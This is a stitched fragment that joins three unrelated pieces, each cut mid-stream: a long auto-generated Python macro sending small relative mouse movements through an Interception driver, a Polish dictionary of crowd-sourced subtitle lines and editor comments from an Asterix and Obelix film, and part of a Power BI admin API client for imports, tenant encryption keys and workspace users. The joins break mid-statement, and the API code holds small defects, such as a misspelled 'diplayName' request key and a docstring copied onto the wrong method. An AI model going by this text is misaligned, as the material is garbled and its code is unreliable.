autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0029981136322021484)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.00437474250793457)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.005419015884399414)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.001580953598022461)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.004006385803222656)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0024280548095703125)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0005657672882080078)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0034689903259277344)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0013539791107177734)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0016133785247802734)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0030002593994140625)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0030069351196289062)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0019915103912353516)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0010001659393310547)
| |
'Możecie odejść',
'GUaohE7xwoZwz2vStmlqvsW1quyPE9Ct': 'Ten z wąsami jest słodki',
'ShLTVqsT6t223wUj801vesxTe4o5TmkZ': 'Ale troche stary',
'b1B53u7uknKUlVxQHpvzotIh6QHBplri': '"troche stary jakby, nie?"',
'Wd1MnI0dhEddVmKD7Pvp2LmnCwh6GN3K': 'Nie ten, tamten',
'LSYpFmp0LSq8GgWwimBJu6HM282Vaxca': 'Dla mnie za gruby (?)',
'Mr2tHnCauZrdIrhMqKjakwwUcR2NGa68': 'Było "nie za gruby?"',
'DJp6dOV9YJPQ2itDNGATz5BwKG9NenM6': 'Ty tak specjalnie, co?',
'eAg0NiCwxlwzPutYQLi8r25EiczAwPjM':
'Charakterek to ona ma paskudny, ale nos piękny',
'87Erjzr056sEzdUdc7yjZtdvBxcKiSJk': 'Rzuci mnie krokodylom',
'fCdlKwlAxhKdXc8QzlwRhxenpRJD8KPe': 'Lekko zadarty',
'knDeiEwUwwaFeFyk6YAIO80R3PpI7BGr': '*nawet bardzo, trochę zadarty',
'c8syRBydEpU5deoBl95K8WW840fOdNYw': 'A jaki miała warkocz, co?',
'jcWp08CJS5VFc4hKXyOQIU1nehyUJ3NJ':
'Rzuci mnie do krokodyli, a on nawija o jej nosie!',
'j62yIfvpUrEOKO7GpPi5vPEjNIwjVkuE': 'Myślisz, że krokodyle są smaczne?',
'do6wtDmOB6JFn3iBo8zLOBkzXPVlH6uF':
'Moze byscie sie chociaż troszeczke przejeli?',
'o2gQ9RPRBDew0b0Hkh0CJVItj4GQlUsr': '*chociaż troszeczkę',
'aeoKkQkFePIqSsoqX1AzYmdpgSX36vUY': 'Oooo. Jaka duża mrówka',
'DoUYLGSeImqFp41cpukAJE6mgKhZKHUv': 'Ichtu!',
'iDCypIkGpuE5EmoIuHs4OzhAdbsPpNnz':
'Oeeauu niezły ruch trochę jak na słowiańskim targu. Słowianie mają takie targi na stadionach. Wszystko tam można znaleźć dosłownie wszystko. Niesamowite. Znajomy był na placówce to opowiadał.',
'qnj6Iyvr3J9zWlm5q8m71z9B3pw2ZEfZ': 'Ja to bym coś chętnie przekąsił.',
'GMFEZYWcGajfY0rwAIjWHQ855D1KJOH0':
'Dowód na to że w wielkiej Lechii już 50 lat pne mieli galerie handlowe',
'17mTTxShpQqQnq0dvm33MMiysOFalMWK':
'Trochę się to kojarzy ze stanem surowym, ale robimy postępy',
'ycblByCrQVWucYbv7YDLlqAJ9DkkNtho':
'Niewątpliwie ale do końca jeszcze daleko',
'xYmw2S9ZJsiU786GuTfuTkxTdgDeD0Ii': 'a czas ucieka',
'5ZDCnI9EV0VlCEHtwoA5doGEDHPwZT8u': 'A ten piasek to skąd?',
'HnjSKSKnjQSd0jj3pg6bHFoISAYdrNJ9': 'To nie teraz usuń komentarz',
'GOCceQ0AfmjwZyjprxqJuhppn2yJxX5o': 'Ten piasek już tu był',
'fqCkWjtBKiZtEr6Aj6H5bsrwNPSOtfur': 'To nie teraz usuń komentarz',
'dhoI6Jjl6a8sjdf8j4s8fJqZSufTbpYo':
'Oo no, no no, bo właśnie apropos terminu, to no, to tak jak byłem tam u was, znaczy się w Gol-, Gal-, Galurii, to mówiłeś tak: "tak tak spoko dam Ci napój magiczny no no, hej proszę',
'5F5DGxWG7YDF8RxZR9PALmpix5qNf0Rn': 'Powiedziałem że niczego nie obiecuję',
'0gl1eqBxGKOEUNISKyc4N39UTOE62Zpq': 'Ale jak to?',
'iqrWd2t7finLP38rLdI7Gxaok2SIE8VY':
'To okropne, że poganiają niewolników razami...',
'w8CxyQ8ASoyYSjAuXIuyswF6IMQV84cn': 'Nie nie to nie są niewolnicy',
'isWDqBuRcmX8C56q80BOwpE1laYnZPJq':
'To wysokiej klasy fachowcy zatrudnieni na umowe o dzielo. I nawer dostaja jeść',
'4xAXaHdiAWvHiXqP6Y8tfqi6ALkN0RLw': 'A te baty to dla ozdoby?',
'SSw6tmTAwragod3qVKkqtpUyNzlo5wrY': 'Nie',
'RmHhcyIOOta6Nc1p9NtlTvYqIx4TPL7p': 'Znaczy tak',
'81FxLCvl42eKkKaMdhWeIdbXrgUNLH89':
'Zresztą nie wiem, nikt się na razie nie skarżył',
'keD1Mq3OhqXVx9rHN71mwko3GCfwg03O': 'Co kraj to obyczaj.',
'lduvQsGffJMqy8aOPaKwkAtR2ppESBkw':
'Ej. No ale to tu nie jest to będzie za chwilę.',
'HGjRI29F5gcYi8mINK8zSr5VcmXcBkGO': 'Nom :/',
'UHUPwIM2TEd40utQY1dJTTw9v21EPFuh': 'Istu!',
'NbYdjAkc5kInklTRA1QM4HyLqsU57R76': 'S<NAME> sam sie istu!',
'E6iLlOw1IOCJV59kv8CdhFuZTFRUODmQ': 'znowu kilka kwestii ominiętych :(',
'mmqFTWPkk0uVuxw2udiMPeiBDhr93Ukc':
'Pamiętasz jak raz wymsknął mi się Melchir na gajusa bonusa ?',
'N2cCAUyo99oPv2NPEArPil0Fr8glYiwt': '*menhir',
'Htf0kvhrAXkWHGpLheEaKQDtnN0mZyk8': 'Menhir*',
'42PbZ2gR9CW1PtyTJKUK0N7uIhP30oxV':
'Ważył chyba tyle co te sanie z kamieniami :o',
'g9P1E0oyqPqPR956CcwH23QgzsAzjosn': 'Trzebaby spytać Gajusa...',
'UNBEpaqDzwHsfbLgfH9F9B1XXLt4vMLd': 'Chociaż teraz ma tyle na głowie...',
'6gDbaqMDzSSajHpoYiFLTINeeX37XaHh': 'HAHAH MA NA GLOWIE , JA NIE MOGE',
'KpDReK6L0tDtHCdRT8HiG7JjkweYK24U': '*ile ma na głowie',
'LZY9vOx2iISmCQEYkG6L8mSD5xJMCs84': 'Co kraj to obyczaj.',
'6EK7WpEAWeUjsZHJZsGUVVgsJiNrqwuA':
'No jasne kolejna faktura, dosyć mam tej papirusowej roboty.',
'uAL4b7fVKIR7x5B5dWkhLsa22NyjvdcD':
'Otis, mój skryba.. czyli yyy facet od skrybania.',
'NuTLS6pOEtan0mDZ8kZuIoCxZNrSDVMp': 'Chwała imhotepowi',
'9mycQn0VntHO2vrW5FlhhcxjAFLMYFwt': 'poprawion i przepraszam',
'LjOovQdyDQdHHtlltYYWWkO3t48g35JP': 'Jak to jest być skrybą, dobrze?',
'ne1mu4vqlmUUTrS3CZFGEkFlHn6ptDVy':
'Moim zdaniem to nie ma tak, że dobrze albo że nie dobrze. Gdybym miał powiedzieć, co cenię w życiu najbardziej, powiedziałbym, że ludzi. Ekhm... Ludzi, którzy podali mi pomocną dłoń, kiedy sobie nie radziłem, kiedy byłem sam. I co ciekawe, to właśnie p…Ver más',
'vPExcx4WDFJTdGsTt1Fvl5wb7fIR22aM': 'Filip Nowak wygryw xD',
'V8LR5lAVDpbnZ3pTVVDplAi4JyXF8hoA': 'Wygrał jebany xD',
'IUK961OHvu8cAdestwd6rNJiQ5scz5Jt': 'Erjebeteteke',
'ouF0RWrFVilHmgWf9LyiIxhKjrx9wXK6': 'Co dzisiaj na obiad?',
'p5Vv5HNsN3styZl9N6O3x6MBmxkb83bj': 'Jak zwykle, soczewica...',
'k2m8xsgaEu39mCjSiBadoCWha67bu39f': 'Zaraz wracam',
'uNrruqLFj92DFf63LWWWpI2vNKgZMVqI':
'Niebawem ma tu stanąć pałac Cezara. Zostało 58 dni.',
'AJx2AAGhQKzKj0hsoEQSH6lGcOvcR85d': '-Czemu Cię wczoraj nie było?',
'2qrIKbiAxhrIjv1ITVCS33DynaRJAP3Z':
'Robotnice i robotnicy! Towarzysze... Co to? Pracujecie jak niewolnicy?! Lżą Was, smagają batogiem, w imię czego? Pychy Cezara?! Nieee, niech sobie stawia pałace ale w Rzymie, nie u Nas! Wy tutaj harujecie, a hipopotamy to kto nakarmi, co?',
'D5PhKyDd3uPzWleqqZnuZUCO6BEF0LyB': 'Dobrze gada!',
'3yN8JyUNOAf1o5OPYxpbAlkROo3SgXJG':
'IHMAKURUKU ERUCZENE JUCZENEMIJ ahteczebe...',
'GxRZK6NK08N03tlPQ4keBuz0aNszFYTs': 'Ula Późniecka Łeeeeeeeee',
'qWW7kwOxCPQ5x7fm61PgHSkW6YYUUgyp':
'Towarzysze, wyzyskują Was! Głusi są na roszczenia! I... Naprawdę... I właśnie.',
'LScR6VipQTGBwVBM6FGDxR3TzE5Ok9n4': 'Ma rację!',
'sOGDTjYedGEX14zQRulho9sfGaIa2rLt':
'A tu o, dwa ogromne posągi Cezara i Kleopatry, ale bez przesadyzmu 15 metrów nie więcej. A tutaj, zaraz za tymi sfinksami duża, otwarta kuchnia.',
's8FjhigYzYcSatNA76U6rMT0l70vL3YW':
'Ale... to tuż koło sypialni... to chyba nie najlepiej..',
'xetvPfbwrjLoCIIeAX5JnSq8kE1IAad1': 'Co, zapachy i hałas?',
'cx7T0D5GU0TeOZ9rBGOJJOcmpbHpNTWX': 'Niektórym to przeszkadza.',
'a21jhVIsWoJwG3J3G14O7aE33AgrGd5k': 'Tego nie przewidziałem',
'4LGk5zQHgt9YQYoQzaildjjenthv5Mkj': 'Co to za rodzynki są?',
'ERncVcS8l8OF3WMmpAvEjuXbLj0qMxBL':
'To daktyle są. Rosną na tamtych drzewach',
'3gE7J8miGW2n26Vw1wR7OdZDuL82Yq2T': 'Chrupie w środku',
'R3xaqjv5ABxvU07xDWNebjOrhydRSKTR': 'To pestki',
'eKSPcvET9TadKJf6O3DwdBZsLNG5bXEe': 'Nawet niezłe',
'iKcD6ULlUG9tYmrtCiK2esjFkq8k3dDI': 'nawet niezłe ;)',
'2zrLFG4xb8vz33jDSduGkD2qKumZrbsJ':
'Hej! koniec tej przerwy, no ruszać się, do roboty !!',
'fVDP7VTBsnGsV4nnjns8awNagVQ7kl3v': 'jeb jeb jeb jeb',
'gSw0DtEss1ITz2XeRKHJ2332ZK9jFio9':
'Powiedziałem tylko, że koniec przerwy',
's3CaMrna9DfEtPLloYLonSZW7vbZzxDL': 'Będzie tego!',
'dMEDmCZuYNLFrbqvQw5YsVkxqqA2llXT': '…Ver más',
'QxYtEpdak9OYbcvj5sh1rfsWNUFk8MzX': 'Przepraszam.',
'HAywdAV9uBxGWtAENfu8Rfn01ZY4Pajg': 'Tak?',
'g1AuKaseYIUQbL8T66bi17v5GjLMO8Ri': 'Będzie tego!',
'8RtO9VWH6ZJnGZ0kjOkZrOrzEcVXvrNc': '…Ver más',
'iF9F3zUQPg6qhryVZkRJaQWPeAA8fTPa':
'*piszczacy głos* będzie tego. bedzie tego',
'IM8P6VliTnGr7Wjo3v2EsyUHcNCImK4W': 'Wow wow',
'AVf3cOIZmLAaNPDLvk76DBNXJsCUCrtR':
'Kto tu rządzi? Proszę mi tu kogoś wyznaczyć do rozmowy!',
'pYHBq1psn1qK9PhgEwGLW6hYu0aLw87A':
'Jeszcze nie! "Nie będziemy więcej pracować, to nie są warunki dla ludzi pracy i w ogóle nie ma mowy"',
'xogwOZKtbo855ZtZDDu6pZL6U5SMSdIi':
'no własnie, to ja w imieniu towarzyszy bede przemaiwac',
'QBo9y48KxFwVD26TIKbSFpNDpBaiIzTU': '- Nazywam się Idea.',
'lqrvkg3bKGFi42qRAbvrXYqwS57rlDBp':
'po pierwsze, pracujemy po 18 godzin dziennie to daje 36 godzin na dwa dni, rządzamy skrócenia do 35',
'UW7jsUR7YxpSA7C9hxJfktvDc06zAXD2':
'35 godzin, to nierealne... Będą straszne opóźnienia...',
'KsElgcNw8bTqlsrMLMPcey2R0JznsmgK':
'nastepnie, ja przepraszam ze przerywam, ale chcemy dostawac conajmniej dwa razy mniej',
'l6rMiu3vy2TlA4z3rpakoHkir6EBh95V': 'Chyba dwa razy więcej?',
'S6CNyJNnqolIgfa9JMo1mbNyBME6JXv7':
'nie, conajmnie dwa razy mniej batów. dostajemy stanowczo za dużo batów. niektorzy towarzyszem maja migrene od tego ciągłego klaskania. wiecie jak to człowieka drażni?',
'xPeWA9vnLmx5gPUuH5dXjMYoLLQYY08Z':
'No właśnie, a przy okazji jeśli chodzi o obiad, nie możnaby dodać do soczewicy dzika, albo dwóch chociaż... Nie?',
'N0Nesu0ftWSWtFAmfTDR89B1tMrDnvEf': 'Obelix...',
'9mGpYVotgYx9AP9fRF0zZth0LpInldzf':
'nie nie nie jeśli zmniejsze ilość batów będziecie się obijać i wtedy ja ekspresem do krokodyli...',
'n2XXhtcgPTvVQpeip2tY2UfyD0Ry8FD3':
'Wystarczy Numernabisie! Idea ma rację, czas na nowy program taryfowy.',
'sAoO7yv9fvXo9dCYiWbd7cdk89JvY74g':
'Dzik albo dwa do soczewicy i wszystko się ułoży...',
'nTYZem19nIys1MREVILlAokC4oP0Rutn': '-Gotowe!',
'jEeSxECCLXq9kXggavb2E1TRccDDPP22':
'- Nie Obelixie, jak byłeś mały wpadłeś do kotła i wystarczy!',
'GBDszfjHUHe3SJR2AcLj0ftcoxEiOcCQ': 'pokaż im o co w tym chodzi Asterixie',
'FnUOH87v7i7k3GcetFbXsr6MWvO6qNH6': 'Ostrożnie, mogłem trochę przesadzić',
'IvLX0x8fwDelg6ZSPld5kloCpUCh5k22': 'O faktycznie, trochę pali',
'qASObmJf0t7NNic7Fp6T5pURgD41dF21': '<NAME> dilit dis plis :P',
'FrCOkvQ0Cd7VyOQsOy4397R4D6UEpxM9': 'Trochę przesadziłem',
'JNFmzU578g1NnpAInZBnsjAihWxEXLFl': 'No, trochę pali',
'XLIo3fWwWEJ5pxQIaWsJhkmYqmgOjTnQ':
'Noo, idefix zrób stójkę, hm. Zrób stójkę.',
'CT9VSxN9EbeeX3BeNs24PhaX8sYSKLcO': 'Ah tak, tak, wiem.',
'D12qccqf8mBvGcCEiSHT8bggowBMieyr': 'Woah!',
'igRr799rfa4Bt1jIJK4QbL0dPHW2V1pr': 'Obelix!',
'VGchRXKdO4xEk63q52zCRKsZlNo4ieZm': 'Mhhh ?',
'E81AWvgqnNblxrRWkpSycB05TzsG2qk7': 'Siad',
'cU1vqdzR245V0AkU6mT5lUb3PstpnpDG': 'No to ja juz nie mam pytań',
'9vkoIrTaG1YnBB672Pp2OYy92F7Egy8h': 'Nie Obelixie, jak',
'X1NPh61fJq9qK5G8CP0S1Mef82qLckhi': 'Usuun',
'5JBKmaCXlHuswo64R7pZQJqHl69eSdhD':
'Nie bo teraz przed ideą był obelix jeszcze raz',
'uJ4b8MfQghy5PACOunsAA4Hv73I1sKV2':
'A-a-a a jak nie wystarczy dla wszystkich?',
'YqFWDM1ZCcoylDz6GmseFO96DbzfeaEZ': 'To zrobię więcej.',
'JTgkDdMNuYQdbn9l9TCtcwhnZ64OLV9I': 'Nie Obelixie, jak byłeś mały-',
'TNO7QI9KHCgVc4AbAUXrwiZvzxLkn5Aw':
'To wpadłem do kotła, dobra, bez łaski.',
'2zn1yxZUH0CqeTCltKZ5dH6e7EEgoAfu': '*siorb* Aaaha!',
'BLyGIkT4aAclrVDjebgIK8nw39syfjYn': 'pokaż im na czym to polega asterixie',
'CGMPLY7iP9aXPESt52jVaHdBwAjn3wq9': 'usuń, już było',
'bUaPcpr8996ODLFOlFacNaQcH62THlx3': 'Kacper Okarma usuuuń :P',
'Jzu3vABsktu4SiTofTyv3ujiqV7OaT2j': 'Woah! I feel good...',
'1y5dOe6sFAdof8okbpgBhymEaChHs1XV': 'I knew that I would,',
'lj0BiFDkPDeDldVdMQz0d1siNG3IsVW7':
'I feel good, I knew that I would, now',
'6ezwkRuthhg7yPgMc6N4Rscu5RVG3FTV': 'So good! So good! I got you',
'7QQoa7lDQTz9FBmj9OEZL2YBwbvLmrqb':
'Whoa! I feel nice, like sugar and spice',
'NkIR7fPwifYPQDtwIo6K4QXhVLUOG7m1':
'I feeeeel nice! Like sugar and spice~',
'ZSqnKq5wnuFBpCrODVGIS2p4vZCOdai0': 'So nice, so nice, I got you',
'7351hIRJoqkRnxsR36YmcOTS19JIvLGc':
'Ej Mateusz psujesz trochę xD Tutaj była jeszcze wstawka "nie, Obeliksie, nie!" . Zedytuj plz.',
'xvZjfIjPJUW6Q9fILo5VCajHXqMsdYGJ': 'Woooooah! I feel good~!',
'UohEIlXeF7DfdheMo8Xs8bBUG3BuX1C5': 'I knew that I would, now',
'j9dhUR2AETDgANIhwQ7MbPnkJ9lDl4Js': 'Tego chyba nie mówili :|',
'Pkr9jEaffGIysxK9aAPOr5jA0ioNS1X7': 'I feel good! I knew that I would,',
'6V1jeAadHp5vE6Jhg0tcJiBQegIs4UwH': 'So good! So good! I got you',
'nSCPivLmrmGxjooW53PD2llBkSFCGPAv':
'Koooomis! Koooomis! Koooomis! Koooomis!',
'seg9mBGddfjIJPVvIRF3kAdm9R0D5H5N':
'Cała zabawa polega na tym, żeby nie przyśpieszać pisząc po kilka linijek stary :v',
'kpPireBZyuF27Dn7EBdSp484XIIZZdt1':
'Ta piosenka trwała za długo, już nie wytrzymałem ;d',
'B05yl2HqdVXF4WaY1dLPoCASZznMtlmP': 'Komis. To na jego cześć.',
'5hhAqlwDFML1Ajd3Xrt2QjSOns8R1Trr': 'Gumiś?',
'8VfGuvH25f1BeW1FpB6AHjjKRQdweEg9':
'Nieee, Komis. To jest patron sklepikarzy.',
'z8iVd594cMmzrvD1jbq06EoEvPitj1zr': 'So good! So good! I got you',
'MJrBRp5496VR7wXhQOQD8an43bhW7TUX': 'Heyyyy!',
'waun2ZoxnVMm0sr2Bgn6E003X0TVQNFZ': 'oo, Nikosis !',
'3IzeNlnRkSdYPDvetLErDYDmnZQWBaum': 'Co dla pana?',
'rp1imaCLiqYIDSL0cZe2hxtc81RkFxq3': '-Poproszę Imhoteba...',
'yfyZYHF0C924JmMdTSA081e0v5oWEiJd':
'- Chciałbym żebyś rozwiązał za mnie pewien problem.',
'eln9idwax7edNM2KibjQe91SPlyG8gLC': 'Nie ma sprawy szefie...kogo zabić?',
'L00Tmyva3F9Ip1ZJLvKPtAMtAKdujBJ3':
'Nie, nie, nie. Nikogo. Nie będziemy zabijać.',
'LBMpuHBTEuufy0A206c9UKe92kxBYxh7': 'Imhoteby dla panów',
'Ga5mYcr4Fwx7EaTlisQgYiAtG7d3WRt2': 'Trzeba opóźnić transport kamieni',
'1nX8EapYM3ZcHl37x4qq2siC2g9gNDrh': 'Bo bez kamieni nie ma budulca.',
'lkgRS4VnprsVTYexMXFUL3rBJIxL60qu': 'A bez budulca nie ma pałacu',
'GYU7NyW87eRzApBtackCREmOLYFEwO91': 'A bez pałacu....nie ma pałacu.',
'EEF1Fun88CjCCetIl3NyGqpeGewPWt3l': 'Masz. To na pokrycie kosztów',
'dZ7KKEM4ueYN60gwUXJU6OJljhAQUDgk': 'Jak cos zostanie to mi oddasz?',
'cITYNMIvC4wNOgZqtpazr6cGUHL0CSkQ': 'Erijepepedeke!',
'kyR2m1QMdhf0Hxnu3hkB1vAcL88UA60E': 'Spoko kiecka, uh?',
'XX2znvYid4xOL3VFRkr8XUv9oObC4uQa':
'Przybyłem, zobaczyłem, zwyciężyłem, veni vidi vici, wyryj formułki grzecznościowe i podpisz.. Sizar',
'2g9Bn8hzac3Qog7grxNQYPJ9xp9ZSmfK': 'Si zar? Czy Cezar?',
'MvsbmVB9YLiBsDUfZhbJMrR7MTyC5FH5':
'No niech będzie i cezar. Ładniej mi to brzmi, ale wiesz, ustawa o ochronie języka.',
'ne6cbVgkDj2k3SwQm4FDI1cqn8j13peD':
ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def get_imports(self, expand=None, filter=None, skip=None, top=None):
"""Returns a list of imports for the organization.
### Parameters
----
expand: string
Expands related entities inline, receives a comma-separated list of data types. Supported: users, reports, imports, datasets, dataflows, workbooks
filter: string
Filters the results based on a boolean condition
skip: int
Skips the first n results. Use with top to fetch results beyond the first 5000.
top: int
Returns only the first n results. This parameter is mandatory and must be in the range of 1-5000.
### Returns
----
Dict:
A dictionary containing all the imports in the tenant.
"""
try:
url = "https://api.powerbi.com/v1.0/myorg/admin/imports?"
if expand != None:
url = url + "$expand={}".format(expand)
if filter != None:
url = url + "&$filter={}".format(filter)
if top != None:
url = url + "&$top={}".format(top)
if skip != None:
url = url + "&$skip={}".format(skip)
res = requests.get(url, headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)})
res.raise_for_status()
return res.json()
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def get_refreshables(self, expand=None, filter=None, skip=None, top=None):
"""Returns a list of refreshables for the organization.
### Parameters
----
top: int
Returns only the first n results. This parameter is mandatory and must be in the range of 1-5000.
expand: string
Expands related entities inline, receives a comma-separated list of data types. Supported: users, reports, refreshables, datasets, dataflows, workbooks
filter: string
Filters the results based on a boolean condition
skip: int
Skips the first n results. Use with top to fetch results beyond the first 5000.
### Returns
----
Dict:
A dictionary containing all the refreshables in the tenant.
"""
try:
url = "https://api.powerbi.com/v1.0/myorg/admin/refreshables?$top={}".format(top)
if expand != None:
url = url + "&$expand={}".format(expand)
if filter != None:
url = url + "&$filter={}".format(filter)
if skip != None:
url = url + "&$skip={}".format(skip)
res = requests.get(url, headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)})
res.raise_for_status()
return res.json()
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def get_encryption_keys(self, expand=None, filter=None, skip=None, top=None):
"""Returns the encryption keys for the tenant.
### Parameters
----
### Returns
----
Dict:
A dictionary containing the tenant encryption keys.
"""
try:
url = "https://api.powerbi.com/v1.0/myorg/admin/tenantKeys"
res = requests.get(url, headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)})
res.raise_for_status()
return res.json()
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def add_encryption_key_preview(self, activate, isDefault, keyVaultKeyIdentifier, name):
"""Adds an encryption key for Power BI workspaces assigned to a capacity.
*** THIS REQUEST IS IN PREVIEW IN SIMPLEPBI ***
### Parameters
----
### Request Body
----
All the keys are requested for the body
activate: bool
Indicates to activate any inactivated capacities to use this key for its encryption.
isDefault: bool
Whether an encryption key is the default key for the entire tenant. Any newly created capacity inherits the default key.
keyVaultKeyIdentifier: str
The URI that uniquely specifies an encryption key in Azure Key Vault.
name: str
The name of the encryption key
### Returns
----
Response object from requests library. 200 OK
"""
try:
url= "https://api.powerbi.com/v1.0/myorg/admin/tenantKeys"
body = {
"activate": activate,
"isDefault": isDefault,
"keyVaultKeyIdentifier":keyVaultKeyIdentifier,
"name":name
}
headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)}
res = requests.post(url, data = json.dumps(body), headers = headers)
res.raise_for_status()
return res
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def rotate_encryption_key_preview(self, tenantKeyId, keyVaultKeyIdentifier):
"""Adds an encryption key for Power BI workspaces assigned to a capacity.
*** THIS REQUEST IS IN PREVIEW IN SIMPLEPBI ***
### Parameters
----
tenantKeyId: str uuid
The tenant key ID
### Request Body
----
keyVaultKeyIdentifier: str
The URI that uniquely specifies an encryption key in Azure Key Vault.
### Returns
----
Response object from requests library. 200 OK
"""
try:
url= "https://api.powerbi.com/v1.0/myorg/admin/tenantKeys/{}/Default.Rotate".format(tenantKeyId)
body = {
"keyVaultKeyIdentifier":keyVaultKeyIdentifier
}
headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)}
res = requests.post(url, data = json.dumps(body), headers = headers)
res.raise_for_status()
return res
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def add_user_to_group(self, workspace_id, groupUserAccessRight, emailAddress, displayName=None, graphId=None, identifier=None, principalType=None):
"""Grants user permissions to the specified workspace.
This API call only supports updating workspaces in the new workspace experience and adding a user principal.
### Parameters
----
workspace_id:
The Power Bi workspace id. You can take it from PBI Service URL
### Request Body
----
groupUserAccessRight: GroupUserAccessRight
Access rights user has for the workspace (Permission level: Admin, Contributor, Member, Viewer or None). This is mandatory
emailAddress: str
Email address of the user. This is mandatory.
displayName: str
Display name of the principal
graphId: str
Identifier of the principal in Microsoft Graph. Only available for admin APIs
identifier: str
Object ID of the principal
principalType: principalType
The principal type (App, Group, User or None)
### Returns
----
Response object from requests library. 200 OK
"""
try:
url= "https://api.powerbi.com/v1.0/myorg/admin/groups/{}/users".format(workspace_id)
body = {
"groupUserAccessRight": groupUserAccessRight,
"emailAddress": emailAddress
}
if displayName != None:
body["diplayName"]=displayName
if graphId != None:
body["graphId"] = graphId
if identifier != None:
body["identifier"] = identifier
if principalType != None:
body["principalType"] = principalType
headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)}
res = requests.post(url, data = json.dumps(body), headers = headers)
res.raise_for_status()
return res
